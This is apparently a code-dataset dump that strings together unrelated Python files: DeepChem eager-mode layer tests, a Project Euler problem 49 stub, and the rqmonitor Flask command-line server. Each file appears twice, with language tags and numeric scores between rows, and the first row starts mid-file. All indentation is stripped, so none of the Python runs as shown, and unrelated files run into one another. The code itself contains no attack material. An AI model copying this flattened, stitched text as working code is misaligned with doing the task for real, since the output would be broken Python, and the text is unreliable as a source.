width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
"""Test invoking LSTMStep in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_feat = 10
y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
state_one = np.random.rand(n_test, n_feat).astype(np.float32)
layer = layers.LSTMStep(n_feat, 2 * n_feat)
result = layer(y, state_zero, state_one)
h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
assert h_out.shape == (n_test, n_feat)
assert h_copy_out.shape == (n_test, n_feat)
assert c_out.shape == (n_test, n_feat)
assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
def test_weighted_linear_combo(self):
"""Test invoking WeightedLinearCombo in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
layer = layers.WeightedLinearCombo()
result = layer(input1, input2)
assert len(layer.trainable_variables) == 2
expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
def test_dropout(self):
"""Test invoking Dropout in eager mode."""
with context.eager_mode():
rate = 0.5
input = np.random.rand(5, 10).astype(np.float32)
layer = layers.Dropout(rate)
result1 = layer(input, training=False)
assert np.allclose(result1, input)
result2 = layer(input, training=True)
assert not np.allclose(result2, input)
nonzero = result2.numpy() != 0
assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
"""Test invoking AlphaShareLayer in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.AlphaShareLayer()
result = layer(input1, input2)
assert input1.shape == result[0].shape
assert input2.shape == result[1].shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.AlphaShareLayer()
result2 = layer2(input1, input2)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_sluice_loss(self):
"""Test invoking SluiceLoss in eager mode."""
with context.eager_mode():
input1 = np.ones((3, 4)).astype(np.float32)
input2 = np.ones((2, 2)).astype(np.float32)
result = layers.SluiceLoss()(input1, input2)
assert np.allclose(result, 40.0)
def test_beta_share(self):
"""Test invoking BetaShare in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.BetaShare()
result = layer(input1, input2)
assert input1.shape == result.shape
assert input2.shape == result.shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.BetaShare()
result2 = layer2(input1, input2)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result, result3)
def test_ani_feat(self):
"""Test invoking ANIFeat in eager mode."""
with context.eager_mode():
batch_size = 10
max_atoms = 5
input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
layer = layers.ANIFeat(max_atoms=max_atoms)
result = layer(input)
# TODO What should the output shape be? It's not documented, and there
# are no other test cases for it.
def test_graph_embed_pool_layer(self):
"""Test invoking GraphEmbedPoolLayer in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphEmbedPoolLayer(num_vertices=6)
result = layer(V, adjs)
assert result[0].shape == (10, 6, 50)
assert result[1].shape == (10, 6, 5, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphEmbedPoolLayer(num_vertices=6)
result2 = layer2(V, adjs)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_graph_cnn(self):
"""Test invoking GraphCNN in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphCNN(num_filters=6)
result = layer(V, adjs)
assert result.shape == (10, 100, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphCNN(num_filters=6)
result2 = layer2(V, adjs)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result, result3)
def test_hinge_loss(self):
"""Test invoking HingeLoss in eager mode."""
with context.eager_mode():
n_labels = 1
n_logits = 1
logits = np.random.rand(n_logits).astype(np.float32)
labels = np.random.rand(n_labels).astype(np.float32)
result = layers.HingeLoss()(labels, logits)
assert result.shape == (n_labels,)
| pt | 0.199146 | 2.679691 | 3 |
py/py_0049_prime_permutations.py | lcsm29/project-euler | 0 | 13598 | # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 49
timed.caller(dummy, n, i, prob_id)
| # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 49
timed.caller(dummy, n, i, prob_id)
| it | 0.138422 | 2.965898 | 3 |
rqmonitor/cli.py | trodery/rqmonitor | 0 | 13599 | <gh_stars>0
"""
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
UnixDomainSocketConnection,
SSLConnection)
from urllib.parse import urlparse, parse_qs, unquote
import click
from flask import Flask, Response, request
from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")
def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
"""Add HTTP Basic Auth to a blueprint.
Note this is only for casual use!
"""
@blueprint.before_request
def basic_http_auth(*args, **kwargs):
auth = request.authorization
if auth is None or auth.password != password or auth.username != username:
return Response(
"Please login",
401,
{"WWW-Authenticate": 'Basic realm="{}"'.format(realm)},
)
def create_app_with_blueprint(config=None, username=None, password=<PASSWORD>,
url_prefix='', blueprint=monitor_blueprint):
"""Return Flask app with default configuration and registered blueprint."""
app = Flask(__name__)
# Override with any settings in config file, if given.
if config:
app.config.from_object(importlib.import_module(config))
# Override from a configuration file in the env variable, if present.
if "RQ_MONITOR_SETTINGS" in os.environ:
app.config.from_envvar("RQ_MONITOR_SETTINGS")
# Optionally add basic auth to blueprint and register with app.
if username:
add_basic_auth(blueprint, username, password)
app.register_blueprint(blueprint, url_prefix=url_prefix)
return app
def check_url(url, decode_components=False):
"""
Taken from redis-py for basic check before passing URL to redis-py
Kept here to show error before launching app
For example::
redis://[[username]:[password]]@localhost:6379/0
rediss://[[username]:[password]]@localhost:6379/0
unix://[[username]:[password]]@/path/to/socket.sock?db=0
Three URL schemes are supported:
- ```redis://``
<https://www.iana.org/assignments/uri-schemes/prov/redis>`_ creates a
normal TCP socket connection
- ```rediss://``
<https://www.iana.org/assignments/uri-schemes/prov/rediss>`_ creates
a SSL wrapped TCP socket connection
- ``unix://`` creates a Unix Domain Socket connection
There are several ways to specify a database number. The parse function
will return the first specified option:
1. A ``db`` querystring option, e.g. redis://localhost?db=0
2. If using the redis:// scheme, the path argument of the url, e.g.
redis://localhost/0
3. The ``db`` argument to this function.
If none of these options are specified, db=0 is used.
The ``decode_components`` argument allows this function to work with
percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
escapes will be replaced by their single-character equivalents after
the URL has been parsed. This only applies to the ``hostname``,
``path``, ``username`` and ``password`` components.
Any additional querystring arguments and keyword arguments will be
passed along to the ConnectionPool class's initializer. The querystring
arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
are parsed as float values. The arguments ``socket_keepalive`` and
``retry_on_timeout`` are parsed to boolean values that accept
True/False, Yes/No values to indicate state. Invalid types cause a
``UserWarning`` to be raised. In the case of conflicting arguments,
querystring arguments always win.
"""
url = urlparse(url)
url_options = {}
for name, value in (parse_qs(url.query)).items():
if value and len(value) > 0:
parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
if parser:
try:
url_options[name] = parser(value[0])
except (TypeError, ValueError):
logger.warning(UserWarning(
"Invalid value for `%s` in connection URL." % name
))
else:
url_options[name] = value[0]
if decode_components:
username = unquote(url.username) if url.username else None
password = unquote(url.password) if url.password else None
path = unquote(url.path) if url.path else None
hostname = unquote(url.hostname) if url.hostname else None
else:
username = url.username or None
password = url.password or None
path = url.path
hostname = url.hostname
# We only support redis://, rediss:// and unix:// schemes.
if url.scheme == 'unix':
url_options.update({
'username': username,
'password': password,
'path': path,
'connection_class': UnixDomainSocketConnection,
})
elif url.scheme in ('redis', 'rediss'):
url_options.update({
'host': hostname,
'port': int(url.port or 6379),
'username': username,
'password': password,
})
# If there's a path argument, use it as the db argument if a
# querystring value wasn't specified
if 'db' not in url_options and path:
try:
url_options['db'] = int(path.replace('/', ''))
except (AttributeError, ValueError):
pass
if url.scheme == 'rediss':
url_options['connection_class'] = SSLConnection
else:
valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
raise ValueError('Redis URL must specify one of the following '
'schemes (%s)' % valid_schemes)
return True
@click.command()
@click.option(
"-b",
"--bind",
default="0.0.0.0",
help="IP or hostname on which to bind HTTP server",
)
@click.option(
"-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
"--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
"--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
"-c",
"--config",
default=None,
help="Configuration file (Python module on search path)",
)
@click.option(
"-u",
"--redis-url",
default=[RQ_MONITOR_REDIS_URL],
multiple=True,
help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
"--refresh-interval",
"--interval",
"refresh_interval",
default=RQ_MONITOR_REFRESH_INTERVAL,
type=int,
help="Refresh interval in ms",
)
@click.option(
"--extra-path",
default=".",
multiple=True,
help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
"-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
bind,
port,
url_prefix,
username,
password,
config,
redis_url,
refresh_interval,
extra_path,
debug,
verbose,
):
"""Run the RQ Monitor Flask server.
All configuration can be set on the command line or through environment
variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.
A subset of the configuration (the configuration parameters used by the
underlying flask blueprint) can also be provided in a Python module
referenced using --config, or with a .cfg file referenced by the
RQ_MONITOR_SETTINGS environment variable.
"""
if extra_path:
sys.path += list(extra_path)
click.echo("RQ Monitor version {}".format(VERSION))
app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
app.config["RQ_MONITOR_REDIS_URL"] = redis_url
app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval
# Conditionally disable Flask console messages
# See: https://stackoverflow.com/questions/14888799
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.ERROR)
logger.error(" * Running on {}:{}".format(bind, port))
for url in redis_url:
check_url(url)
app.run(host=bind, port=port, debug=debug)
def main():
run(auto_envvar_prefix="RQ_MONITOR")
if __name__ == '__main__':
main() | """
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
UnixDomainSocketConnection,
SSLConnection)
from urllib.parse import urlparse, parse_qs, unquote
import click
from flask import Flask, Response, request
from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")
def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
"""Add HTTP Basic Auth to a blueprint.
Note this is only for casual use!
"""
@blueprint.before_request
def basic_http_auth(*args, **kwargs):
auth = request.authorization
if auth is None or auth.password != password or auth.username != username:
return Response(
"Please login",
401,
{"WWW-Authenticate": 'Basic realm="{}"'.format(realm)},
)
def create_app_with_blueprint(config=None, username=None, password=<PASSWORD>,
url_prefix='', blueprint=monitor_blueprint):
"""Return Flask app with default configuration and registered blueprint."""
app = Flask(__name__)
# Override with any settings in config file, if given.
if config:
app.config.from_object(importlib.import_module(config))
# Override from a configuration file in the env variable, if present.
if "RQ_MONITOR_SETTINGS" in os.environ:
app.config.from_envvar("RQ_MONITOR_SETTINGS")
# Optionally add basic auth to blueprint and register with app.
if username:
add_basic_auth(blueprint, username, password)
app.register_blueprint(blueprint, url_prefix=url_prefix)
return app
def check_url(url, decode_components=False):
"""
Taken from redis-py for basic check before passing URL to redis-py
Kept here to show error before launching app
For example::
redis://[[username]:[password]]@localhost:6379/0
rediss://[[username]:[password]]@localhost:6379/0
unix://[[username]:[password]]@/path/to/socket.sock?db=0
Three URL schemes are supported:
- ```redis://``
<https://www.iana.org/assignments/uri-schemes/prov/redis>`_ creates a
normal TCP socket connection
- ```rediss://``
<https://www.iana.org/assignments/uri-schemes/prov/rediss>`_ creates
a SSL wrapped TCP socket connection
- ``unix://`` creates a Unix Domain Socket connection
There are several ways to specify a database number. The parse function
will return the first specified option:
1. A ``db`` querystring option, e.g. redis://localhost?db=0
2. If using the redis:// scheme, the path argument of the url, e.g.
redis://localhost/0
3. The ``db`` argument to this function.
If none of these options are specified, db=0 is used.
The ``decode_components`` argument allows this function to work with
percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
escapes will be replaced by their single-character equivalents after
the URL has been parsed. This only applies to the ``hostname``,
``path``, ``username`` and ``password`` components.
Any additional querystring arguments and keyword arguments will be
passed along to the ConnectionPool class's initializer. The querystring
arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
are parsed as float values. The arguments ``socket_keepalive`` and
``retry_on_timeout`` are parsed to boolean values that accept
True/False, Yes/No values to indicate state. Invalid types cause a
``UserWarning`` to be raised. In the case of conflicting arguments,
querystring arguments always win.
"""
url = urlparse(url)
url_options = {}
for name, value in (parse_qs(url.query)).items():
if value and len(value) > 0:
parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
if parser:
try:
url_options[name] = parser(value[0])
except (TypeError, ValueError):
logger.warning(UserWarning(
"Invalid value for `%s` in connection URL." % name
))
else:
url_options[name] = value[0]
if decode_components:
username = unquote(url.username) if url.username else None
password = unquote(url.password) if url.password else None
path = unquote(url.path) if url.path else None
hostname = unquote(url.hostname) if url.hostname else None
else:
username = url.username or None
password = url.password or None
path = url.path
hostname = url.hostname
# We only support redis://, rediss:// and unix:// schemes.
if url.scheme == 'unix':
url_options.update({
'username': username,
'password': password,
'path': path,
'connection_class': UnixDomainSocketConnection,
})
elif url.scheme in ('redis', 'rediss'):
url_options.update({
'host': hostname,
'port': int(url.port or 6379),
'username': username,
'password': password,
})
# If there's a path argument, use it as the db argument if a
# querystring value wasn't specified
if 'db' not in url_options and path:
try:
url_options['db'] = int(path.replace('/', ''))
except (AttributeError, ValueError):
pass
if url.scheme == 'rediss':
url_options['connection_class'] = SSLConnection
else:
valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
raise ValueError('Redis URL must specify one of the following '
'schemes (%s)' % valid_schemes)
return True
@click.command()
@click.option(
"-b",
"--bind",
default="0.0.0.0",
help="IP or hostname on which to bind HTTP server",
)
@click.option(
"-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
"--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
"--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
"-c",
"--config",
default=None,
help="Configuration file (Python module on search path)",
)
@click.option(
"-u",
"--redis-url",
default=[RQ_MONITOR_REDIS_URL],
multiple=True,
help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
"--refresh-interval",
"--interval",
"refresh_interval",
default=RQ_MONITOR_REFRESH_INTERVAL,
type=int,
help="Refresh interval in ms",
)
@click.option(
"--extra-path",
default=".",
multiple=True,
help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
"-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
bind,
port,
url_prefix,
username,
password,
config,
redis_url,
refresh_interval,
extra_path,
debug,
verbose,
):
"""Run the RQ Monitor Flask server.
All configuration can be set on the command line or through environment
variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.
A subset of the configuration (the configuration parameters used by the
underlying flask blueprint) can also be provided in a Python module
referenced using --config, or with a .cfg file referenced by the
RQ_MONITOR_SETTINGS environment variable.
"""
if extra_path:
sys.path += list(extra_path)
click.echo("RQ Monitor version {}".format(VERSION))
app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
app.config["RQ_MONITOR_REDIS_URL"] = redis_url
app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval
# Conditionally disable Flask console messages
# See: https://stackoverflow.com/questions/14888799
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.ERROR)
logger.error(" * Running on {}:{}".format(bind, port))
for url in redis_url:
check_url(url)
app.run(host=bind, port=port, debug=debug)
def main():
run(auto_envvar_prefix="RQ_MONITOR")
if __name__ == '__main__':
main() | pt | 0.173777 | 2.100868 | 2 |